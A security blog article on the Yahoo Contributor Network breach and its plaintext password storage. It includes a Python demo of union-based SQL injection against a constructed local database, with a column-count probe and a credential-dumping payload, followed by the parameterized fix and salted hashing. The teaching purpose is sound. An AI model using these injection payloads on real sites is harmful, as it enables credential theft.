A hacking collective calling itself D33Ds Company reportedly broke into a Yahoo subdomain (the Yahoo Contributor Network, formerly Associated Content, according to Yahoo's statement below) using a union-based SQL injection, the variant in which a crafted input appends a UNION SELECT to the application's own query so that rows from an unrelated table, here the credentials table, are returned in the normal results page (oh, those SQL injection vulnerabilities). Breaking in is bad enough, but worse still is that the user credentials D33Ds obtained were stored in plain text: the passwords were not hashed, which is the appropriate control for stored passwords, nor even encrypted, so the dump was usable as-is with no cracking required.
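The mechanics described above, as an added example that is not code from Yahoo, Associated Content or D33Ds: a search endpoint that pastes user input into its SQL, the two attacker steps of a union-based injection (discover the column count, then UNION the credentials table into the results), the parameterized query that closes the hole, and the salted slow hash that should have been stored instead of plaintext. The tables, column names and sample rows are constructed here for illustration and say nothing about the real database; the hash storage format is likewise this example's own assumption.

```python
"""Union-based SQL injection against a string-built search query, then the fix.

Added example for this article; it is not code from Yahoo, Associated Content
or D33Ds. The tables, column names and rows are constructed for illustration
and say nothing about the real database.
"""
import hashlib
import hmac
import os
import sqlite3

# Constructed sample data: the table a public search is meant to query, and a
# credentials table holding plaintext passwords, as the breached site did.
ARTICLES = [
    ("Gardening on a budget", "Start with seeds."),
    ("Cheap weekend trips", "Take the train."),
]
USERS = [
    ("alice@example.com", "123456"),
    ("bob@example.com", "password"),
    ("carol@example.com", "maggie"),
]


def build_db():
    """In-memory SQLite database with the two constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", ARTICLES)
    conn.executemany("INSERT INTO users (email, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """The bug: the search term is pasted into the SQL text, so a single quote
    in the input closes the string literal and the rest is parsed as SQL."""
    sql = "SELECT title, body FROM articles WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, term):
    """The fix: the pattern travels as a bound parameter. Whatever it contains,
    the query stays 'SELECT title, body FROM articles WHERE title LIKE ?'."""
    sql = "SELECT title, body FROM articles WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def find_column_count(conn, search, max_cols=8):
    """Attacker step 1. A UNION only parses when both halves return the same
    number of columns, so probe with a growing list of NULLs until the
    database stops raising an error. Returns the count, or None."""
    for n in range(1, max_cols + 1):
        payload = "nosuchtitle%' UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        try:
            search(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_users(conn, search):
    """Attacker step 2. With two columns known, UNION the credentials table into
    the search results. 'nosuchtitle' empties the legitimate half, and the
    trailing '--' comments out the %' the application appends."""
    payload = "nosuchtitle%' UNION SELECT email, password FROM users--"
    return search(conn, payload)


def hash_password(password, salt=None, iterations=600_000):
    """What the table should have held instead of plaintext: a salted, slow
    hash. The 'salt$iterations$hexdigest' layout is this example's assumption;
    production code should use a vetted library such as bcrypt or argon2."""
    salt = salt if salt is not None else os.urandom(16).hex()
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"{salt}${iterations}${digest.hex()}"


def verify_password(password, stored):
    """Recompute from the stored salt and iteration count; constant-time compare."""
    salt, iterations, digest = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest)


if __name__ == "__main__":
    conn = build_db()
    print("normal search:", search_vulnerable(conn, "trips"))
    print("column count: ", find_column_count(conn, search_vulnerable))
    print("dump (vuln):  ", dump_users(conn, search_vulnerable))
    print("dump (fixed): ", dump_users(conn, search_fixed))
    print("hashed form:  ", hash_password("123456"))
```

Run against `search_vulnerable`, the column-count probe errors once and succeeds at two, and the dump returns every email/password pair; run against `search_fixed`, the same payload is just an odd LIKE pattern that matches nothing. Had the table held `hash_password` output rather than the raw strings, the same dump would have yielded salted PBKDF2 digests that still need to be cracked one by one.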
Yahoo's statement to the media (below) indicates that “approximately” 400,000 email addresses and passwords were leaked as plain text online, while D33Ds Company said it acquired the information from a total of 453,000 user accounts.
"At Yahoo we take security very seriously and invest heavily in protective measures to ensure the security of our users and their data across all our products. We confirm that an older file from Yahoo Contributor Network (previously Associated Content) containing approximately 400,000 Yahoo and other company user names and passwords was stolen yesterday, July 11. Of these, less than 5% of the Yahoo accounts had valid passwords. We are fixing the vulnerability that led to the disclosure of this data, changing the passwords of the affected Yahoo users and notifying the companies whose users' accounts may have been compromised. We apologize to affected users. We encourage users to change their passwords on a regular basis and also familiarize themselves with our online safety tips at security.yahoo.com."
What's interesting is that many of the users made the same mistake Internet users make everywhere: they chose passwords that end users have been told time and again to avoid. For example, "123456" was the password for 1,666 of the accounts, while "password" was used for 780 of them.
Other easy passwords included common first names such as Maggie and Michael (a name is just one case of the broader rule: never use a plain dictionary word as a password) and variations on the number theme (e.g., 123123). The most common password length was seven characters. Seven characters is short by any standard: even with a mix of letters, digits and special characters, a seven-character password stored under a fast hash is within reach of an offline cracking attack, and in this case length made no difference at all, because the passwords were stored in plain text and needed no cracking.
Given the site's changes of ownership and name (Associated Content became the Yahoo Contributor Network), you might not remember whether you ever had an account there. It's easy enough to check: Sucuri Labs has provided a tool that will check whether your email address was among those leaked.
In terms of full disclosure, our email address was in the list, but the account and its password no longer worked after the multiple changes. The password, in fact, was unique among our passwords, as we use a tool to generate and track individual passwords for each site we use.